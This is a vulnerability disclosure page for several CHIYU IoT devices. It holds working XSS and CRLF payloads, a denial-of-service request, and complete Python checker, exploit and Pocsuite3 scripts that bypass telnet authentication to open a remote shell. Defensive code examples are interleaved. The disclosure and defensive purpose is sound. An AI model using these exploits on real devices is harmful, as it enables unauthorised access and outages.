Red Teaming and Malware Analysis
CHIYU IoT devices

Vulnerabilities found on IoT devices from CHIYU.


Last updated 3 years ago


CVE-2021-31249

Title: CRLF injection in CHIYU BF-430, BF-431, and BF-450M TCP/IP Converter devices
Vulnerability: CRLF injection
CVE ID: CVE-2021-31249
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation of the parameter redirect=, which is available on multiple CGI components and is copied into the Location header of the response.

Affected parameter: redirect=
Component: all the CGI components
Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>

Payload

setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>

HTTP request

GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response

HTTP/1.1 302 Found
Location: setting.htm
<script>alert(document.domain)</script>
Content-Length: 0
Content-Type: text/html

Impact: The impact of CRLF injection varies; because the injected line breaks let the attacker write into the response body, it includes all the impacts of Cross-site Scripting, up to information disclosure.

CVE-2021-31250

Multiple stored XSS vulnerabilities were discovered on BF-430, BF-431 and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi and ppp.cgi.

To exploit this vulnerability, an attacker can inject a specially crafted XSS payload through several CGI components to obtain sensitive information from the end-user, such as session cookies, or to redirect them to a malicious web page.

Proof-of-Concept: 01

Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>

HTTP request:

GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response:

Proof-of-Concept: 02

Affected parameter: TF_hostname=
Component: dhcpc.cgi
Payload: /"><img src="#">

HTTP request and response:

GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

Proof-of-Concept: 03

Affected parameter: TF_servicename=
Component: ppp.cgi
Payload: "><script>alert(123)</script>

HTTP request:

GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response

Proof-of-Concept: 04

Affected parameter: TF_port=
Component: man.cgi
Payload: /"><img src="#">

HTTP request:

GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response:

Impact: The attacker stores the payload in the device configuration itself, so it persists and executes in the browser of every user who later opens the affected page.

CVE-2021-31251

Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.

The next image shows the normal workflow with the authentication banner (left side) and the exploited scenario with the configuration menu (right side). In detail, when the device tries to negotiate the telnet options with the client side, the negotiation fails at the fourth TCP request; the IoT device then jumps to the next state and believes that the user has already authenticated.

To verify whether this condition is also present on other devices, a PoC was created; the results can be observed below. On the left side, the checker finds many vulnerable devices; on the right side, the exploit confirms the vulnerability.

Checker in action with multi-thread and CIDR - Pocsuite3:

Exploit in action - Pocsuite3:

Impact: Remote access to any affected device, bypassing telnet authentication entirely.
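To make the negotiation bytes in the PoC readable and to show what a non-bypassable telnet login state looks like, here is an added example (not the page's checker or exploit code, and not CHIYU's firmware). It decodes the IAC option commands the PoC sends (`\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18` is WILL ECHO, WILL SUPPRESS-GO-AHEAD, DO TERMINAL-TYPE; the `\xff\xfe\x01` the checker looks for is DONT ECHO) and models a hypothetical server-side session in which option negotiation, however often it is repeated or fails, can never move the state past the login prompt. The `TelnetSession` class, its negotiation budget and its prompts are assumptions for illustration.

```python
"""Telnet option negotiation decoder plus a server-side login state machine
that treats negotiation trouble as "stay at the login prompt", never as
"already authenticated".  Added example; not the page's PoC code and not
CHIYU's firmware.  Option names follow RFC 854/857/858/1091; the session
class is a hypothetical hardened design."""
import hmac
from enum import Enum

IAC, WILL, WONT, DO, DONT = 0xFF, 0xFB, 0xFC, 0xFD, 0xFE
COMMAND_NAMES = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT"}
OPTION_NAMES = {1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 24: "TERMINAL-TYPE"}


def decode_negotiation(data: bytes) -> list:
    """Split a telnet byte stream into ("WILL"|"WONT"|"DO"|"DONT", option_code)
    and ("DATA", single_byte) items.  IAC IAC is an escaped literal 0xFF."""
    items, i = [], 0
    while i < len(data):
        if data[i] == IAC and i + 1 < len(data):
            if data[i + 1] == IAC:
                items.append(("DATA", b"\xff"))
                i += 2
                continue
            if data[i + 1] in COMMAND_NAMES and i + 2 < len(data):
                items.append((COMMAND_NAMES[data[i + 1]], data[i + 2]))
                i += 3
                continue
        items.append(("DATA", bytes([data[i]])))
        i += 1
    return items


def describe(items: list) -> list:
    """Human-readable form such as 'WILL ECHO', useful in connection logs."""
    return [f"{cmd} {OPTION_NAMES.get(opt, opt)}" if cmd != "DATA" else f"DATA {opt!r}"
            for cmd, opt in items]


class State(Enum):
    LOGIN = "login"
    SHELL = "shell"


class TelnetSession:
    """Hypothetical hardened server session.  The only transition to SHELL is a
    correct password line; option negotiation, malformed or repeated, leaves the
    state untouched (the vulnerable firmware advanced its state instead)."""
    MAX_NEGOTIATIONS = 6  # constructed budget; further options are ignored

    def __init__(self, password: str):
        self.state = State.LOGIN
        self.password = password.encode("ascii")
        self.negotiations = 0
        self.line = b""

    def feed(self, data: bytes) -> bytes:
        out = b""
        for cmd, value in decode_negotiation(data):
            out += self._on_data(value) if cmd == "DATA" else self._on_option(cmd, value)
        return out

    def _on_option(self, cmd: str, opt: int) -> bytes:
        self.negotiations += 1
        if self.negotiations > self.MAX_NEGOTIATIONS:
            return b""  # budget exhausted: ignore the option, state unchanged
        # Refuse every option: DONT answers WILL, WONT answers DO; WONT/DONT need no reply.
        if cmd == "WILL":
            return bytes([IAC, DONT, opt])
        if cmd == "DO":
            return bytes([IAC, WONT, opt])
        return b""

    def _on_data(self, byte: bytes) -> bytes:
        if byte not in (b"\r", b"\n"):
            self.line += byte
            return b""
        line, self.line = self.line, b""
        if not line:
            return b""  # the "\n" of a "\r\n" pair: nothing to do
        if self.state is State.LOGIN:
            if hmac.compare_digest(line, self.password):  # constant-time compare
                self.state = State.SHELL
                return b"CMD>"
            return b"Password: "
        return b"ok\r\nCMD>"  # constructed shell reply


if __name__ == "__main__":
    print(describe(decode_negotiation(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")))
    s = TelnetSession("secret")  # constructed password
    for _ in range(3):
        s.feed(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
    s.feed(b"\x09")
    print(s.state)  # still LOGIN: the PoC sequence alone never reaches the shell
```

The design point is that negotiation and authentication are independent state: running out of negotiation budget, receiving garbage, or receiving the tab byte the PoC sends all leave the session at the password prompt, so there is no code path that reaches `CMD>` without a correct password.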

From vendor website:

Regarding CVE-2021-31251, it explains about the CHIYU serial converters & SEMAC door control panel has a security issue.

Because the telnet is able to connect with the device.

For this reason, CHIYU would like to include below the measures to fix the problem.

From now, all of the shipment has the latest firmware.

The firmware will close telnet.

If you want to upgrade your converter's firmware, please contact CHIYU for upgrading.

Checker and Exploit

# Exploit Title:  (Checker) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
# Date: June 01 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC  
#CVE: CVE-2021-31251
#Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3

#usage : python3 checker.py -t IP 
#usage1: python3 checker.py -f target.txt


import socket
import time
import sys

def checker(HOST, PORT):
    socket.setdefaulttimeout(10)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        connect = s.connect_ex((HOST, PORT))
        try:
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            result = s.recv(1024).strip()
            if result != b'\xff\xfe\x01':
                s.send(b"\x09")
                result = s.recv(1024).strip()
            s.close()

            if connect == 0 and "sername" not in str(result):
                if b"\xff\xfe\x01" == result:
                    print("[+] " + HOST + " is vulnerable to CVE-2021-31251!")

        except KeyboardInterrupt:
            s.close()

        except EOFError:
            s.close()

    except socket.error:
        # Use HOST: the module-level `host` only exists in -f mode, so `host` here raised NameError in -t mode
        print("[-] " + HOST + " NOT vulnerable!")
        return 0


opt = sys.argv[1]

if opt == "-t":
    HOST = sys.argv[2]
    PORT = 23
elif opt == "-f":
    PORT = 23
    with open(sys.argv[2]) as f:
        targets = [line.rstrip() for line in f]
else:
    print("Check the parameters before executing the checker.")
    exit(1)

if opt == "-t":
    checker(HOST, PORT)
else:
    for host in targets:
        if host:
            checker(host, PORT)

# Exploit Title:  (Exploit) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
# Date: June 01 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC  
#CVE: CVE-2021-31251
#Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3

# usage: python3 exploit.py IP

import socket
import time
import sys

HOST = sys.argv[1]
PORT = 23

socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect = s.connect_ex((HOST, PORT))
    try:
        print("[+] Try to connect...\n")
        time.sleep(1)
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        result = s.recv(1024).strip()
        if result != b'\xff\xfe\x01':
            s.send(b"\x09")
            result = s.recv(1024).strip()

        if connect == 0 and "sername" not in str(result):
            if b"\xff\xfe\x01" == result:
                print("Connected! ;)\ntype: \"help\"\n\n")
                while 1:
                    cmd = input("(CHIYU pwnShell:) $ ")
                    body = cmd+"\n"
                    s.send(body.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode('utf8', 'ignore')

                    if not len(result):
                        print("[+] CHIYU device not available, try again ... (terminating)")
                        s.close()
                        break
                    print(result.strip('CMD>'))
                    b = "\n"
                    s.send(b.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode()
                    print(result.strip('CMD>'))
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        s.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        s.close()

except socket.error:
    print("[+] Unable to connect to CHIYU device.")

Pocsuite3 module (checker and exploit):

import re
from collections import OrderedDict
import socket
from pocsuite3.api \
    import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option \
    import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD


class DemoPOC(POCBase):
    vulID = 'CVE-2021-31251'
    version = '1'
    author = 'sirpedrotavares'
    vulDate = '2021-04-15'
    createDate = '2021-04-15'
    updateDate = '2021-04-15'
    references = ['https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks']
    name = 'pwnCHIYU'
    appPowerLink = 'https://www.chiyu-tech.com'
    appName = 'CHIYU telnet'
    appVersion = 'Telnet service (all versions)'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.TELENT
    samples = []
    install_requires = []
    desc = '''
           An authentication bypass in telnet server from CHIYU Technology Inc devices allows obtaining a privileged
           connection with the target device by supplying a specially malformed request.  
        '''
    pocDesc = ''' 
            Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the
            telnet authentication process due to an overflow during the negotiation of the telnet protocol.
            Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may
            force the remote telnet server to believe that the user has already authenticated. Several models
            are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
        '''

    def _verify(self):
        output = Output(self)
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(10)

        try:
            connect = s.connect_ex((host, int(port)))
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            aux = s.recv(1024).strip()
            if aux != b'\xff\xfe\x01':
                s.send(b"\x09")
                aux = s.recv(1024).strip()

            s.close()

            if connect == 0 and "sername" not in str(aux):
                if b"\xff\xfe\x01" == aux:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['rhost'] = self.url
                    return self.parse_attack(result)
                else:
                    result['VerifyInfo'] = {}
                    return self.parse_attack(None)
            else:
                return self.parse_attack(None)
        except socket.error:
            return self.parse_attack(None)

    def _attack(self):
        output = Output(self)
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(10)

        try:
            connect = s.connect_ex((host, int(port)))
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            aux = s.recv(1024).strip()
            if aux != b'\xff\xfe\x01':
                s.send(b"\x09")
                aux = s.recv(1024).strip()

            if connect == 0 and "sername" not in str(aux):
                if b"\xff\xfe\x01" == aux:
                    print("Connected! ;)\ntype: \"help\"\n\n")
                    while 1:
                        cmd = input("(CHIYU pwnShell:) $ ")
                        body = cmd + "\n"
                        s.send(body.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode('utf8', 'ignore')

                        if not len(result):
                            print("[+] CHIYU device not available, try again ... (terminating)")
                            s.close()
                            break
                        print(result.strip('CMD>'))
                        b = "\n"
                        s.send(b.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode()
                        print(result.strip('CMD>'))

        except KeyboardInterrupt:
            output.success({})
        except EOFError:
            output.success({})
        except Exception as e:
            # Generic handler last: EOFError is a subclass of Exception and would
            # otherwise never reach its own clause above
            output.fail('target is not vulnerable:' + str(e))
        else:
            output.success({})

        return output

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


register_poc(DemoPOC)

CVE-2021-31252

An open redirect vulnerability exists in BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, and SEMAC devices from CHIYU Technology. It can be exploited by sending the victim a link with a specially crafted URL and convincing them to click on it.

To exploit this vulnerability, an attacker can inject an arbitrary URL and convince the end-user to click on the link, which redirects them to a page with malicious content. All the CGI components are affected by this flaw.

Affected parameter: redirect=
Component: all the CGI components (if.cgi, man.cgi, etc)
Payload: redirect=http://127.0.0.1/exploit.htm

HTTP request

GET /if.cgi?redirect=http://192.168.187.201/exploit.htm&failure=fail.htm&type=serial_apply&S_type=2&S_baud=3&S_userdefine=0&S_data=3&S_parity=0&S_stop=0&S_flowcontrol=0&S_timeout=0&S_length=0&S_delimiter1=00&S_deli_en1=0&S_delimiter2=00&S_deli_en2=0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/serial.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response

Impact: the improper sanitization of the redirect parameter lets an attacker send users to external websites from a link that starts on the trusted device.
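The CRLF injection above (CVE-2021-31249) and this open redirect (CVE-2021-31252) share one root cause: the CGI handlers copy the redirect= parameter straight into the Location header. The following added example (not the device firmware and not the author's code) shows that vulnerable pattern beside a hardened handler that decodes the parameter, rejects control characters, rejects any scheme or host, and allows only a constructed list of local page names; the function names and the allowlist are assumptions.

```python
"""redirect= handling for a CGI handler such as man.cgi/if.cgi.
Added example (not CHIYU firmware); the page allowlist and function
names are constructed."""
from typing import Optional
from urllib.parse import unquote, urlsplit

ALLOWED_PAGES = {"setting.htm", "fail.htm", "manage.htm", "AccLog.htm"}  # constructed


def vulnerable_redirect_response(redirect_param: str) -> bytes:
    """Vulnerable pattern: the decoded parameter is concatenated into the
    header block.  %0d%0a%0d%0a in the value ends the headers early and
    whatever follows becomes the response body the browser renders."""
    target = unquote(redirect_param)
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            "Content-Length: 0\r\nContent-Type: text/html\r\n\r\n").encode("latin-1")


def safe_redirect_target(redirect_param: str) -> Optional[str]:
    """Return a local page name, or None when the value must be refused."""
    target = unquote(redirect_param)
    # Header injection: refuse every control character (CR, LF, NUL, ...)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return None
    # Open redirect: no scheme, no authority, no protocol-relative or absolute path
    parts = urlsplit(target)
    if parts.scheme or parts.netloc or target.startswith(("/", "\\")):
        return None
    # Only the device's own pages may be redirect targets
    if target not in ALLOWED_PAGES:
        return None
    return target


def safe_redirect_response(redirect_param: str, fallback: str = "setting.htm") -> bytes:
    """Hardened handler: an invalid value falls back to a fixed local page, and
    the header is built only from validated, control-character-free text."""
    target = safe_redirect_target(redirect_param) or fallback
    return (f"HTTP/1.1 302 Found\r\nLocation: /{target}\r\n"
            "Content-Length: 0\r\nContent-Type: text/html\r\n\r\n").encode("ascii")


def body_after_headers(response: bytes) -> bytes:
    """Bytes a client treats as the body: everything after the first blank line."""
    _head, _sep, body = response.partition(b"\r\n\r\n")
    return body


if __name__ == "__main__":
    crlf = "setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>"  # payload from the PoC above
    print(body_after_headers(vulnerable_redirect_response(crlf)))  # script lands in the body
    print(body_after_headers(safe_redirect_response(crlf)))        # b''
    print(safe_redirect_target("http://192.168.187.201/exploit.htm"))  # None
```

The check order matters: decoding happens once, before validation, so an encoded `%0d%0a` cannot slip past a test that only looks at the raw string, and the allowlist is applied to the decoded value that actually ends up in the header.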

CVE-2021-31641

An unauthenticated XSS vulnerability exists in several IoT devices from CHIYU Technology, including BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC. The vulnerability was observed also on more recent firmware versions.

Component: any argument passed via URL that results in an HTTP 404
Payload: http://ip/<script>alert(123)</script>

HTTP request

HTTP response

Impact: This vulnerability is due to the improper sanitization of the requested URL when the HTTP 404 page is rendered; it can be abused to run script in the victim's browser or to redirect users to external websites.

CVE-2021-31642

A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, BF-630, BF-631, and SEMAC. The vulnerability can be triggered by sending an unexpected integer (> 32 bits) in the page parameter, which crashes the web portal and makes it unavailable until the device is rebooted.

Affected parameter: page=
Component: if.cgi
Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000

HTTP request

GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1

HTTP response

After the request, the web portal will be unavailable until a device reboot.

Impact: Device crash and web portal unavailable.
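As an added example (not the device firmware; the records-per-page size and the 32-bit offset arithmetic are constructed assumptions), the following shows how an unchecked page number turns into a wrapped record offset under 32-bit arithmetic, and a parser that validates page= against the real size of the log before any arithmetic happens, so an out-of-range value is answered with an error instead of taking the portal down.

```python
"""Bounds-checked page= parameter for a paged log view (the go_log_page action
of if.cgi).  Added example, not the device firmware; RECORDS_PER_PAGE and the
unsigned 32-bit offset arithmetic are constructed to show the failure mode."""
RECORDS_PER_PAGE = 20   # constructed
UINT32_MASK = 0xFFFFFFFF


def vulnerable_first_record(page: int) -> int:
    """What an unchecked page index does when the record offset is computed in
    unsigned 32-bit arithmetic: the product silently wraps, so a huge page
    number lands on an arbitrary (possibly out-of-buffer) offset."""
    return (page * RECORDS_PER_PAGE) & UINT32_MASK


def parse_page_param(raw: str, total_records: int) -> int:
    """Validate page= against the real size of the log before any arithmetic.
    Raises ValueError; the CGI caller should answer HTTP 400, not crash."""
    # 10 digits is the longest decimal that fits in 32 bits; isascii() keeps
    # isdigit() from accepting Unicode digits such as superscripts
    if len(raw) > 10 or not raw.isascii() or not raw.isdigit():
        raise ValueError("page must be an unsigned decimal integer")
    page = int(raw)
    last_page = max(0, (total_records - 1) // RECORDS_PER_PAGE)
    if page > last_page:
        raise ValueError(f"page {page} out of range 0..{last_page}")
    return page


def page_records(records: list, raw_page: str) -> list:
    """Slice of the log for a validated page; the offset is a Python int that
    is always below len(records), so no wrap and no out-of-bounds read."""
    page = parse_page_param(raw_page, len(records))
    start = page * RECORDS_PER_PAGE
    return records[start:start + RECORDS_PER_PAGE]


def handle_log_page(records: list, raw_page: str):
    """Shaped like a CGI handler: (status, payload)."""
    try:
        return 200, page_records(records, raw_page)
    except ValueError as e:
        return 400, str(e)


if __name__ == "__main__":
    log = [f"rec{i}" for i in range(45)]  # constructed log of 45 records
    print(handle_log_page(log, "2"))            # (200, ['rec40', ..., 'rec44'])
    print(handle_log_page(log, "2781000"))      # (400, 'page 2781000 out of range 0..2')
    print(vulnerable_first_record(214748365))   # 4: the 32-bit product wrapped
```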

CVE-2021-31643

A stored XSS flaw was discovered on SEMAC, Biosense, BF-630, BF-631, and Webpass IoT devices from CHIYU Technology Inc due to a lack of sanitization of the input on the component if.cgi (username parameter).

To exploit this vulnerability, an attacker can inject a specially crafted XSS payload through the if.cgi component to obtain sensitive information from the end-user, such as session cookies, or to redirect them to a malicious web page.

Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>

HTTP request and response - SEMAC Web Ver7.2

GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1

HTTP request and response - BIOSENSE-III-COMBO(M1)(20000)

GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
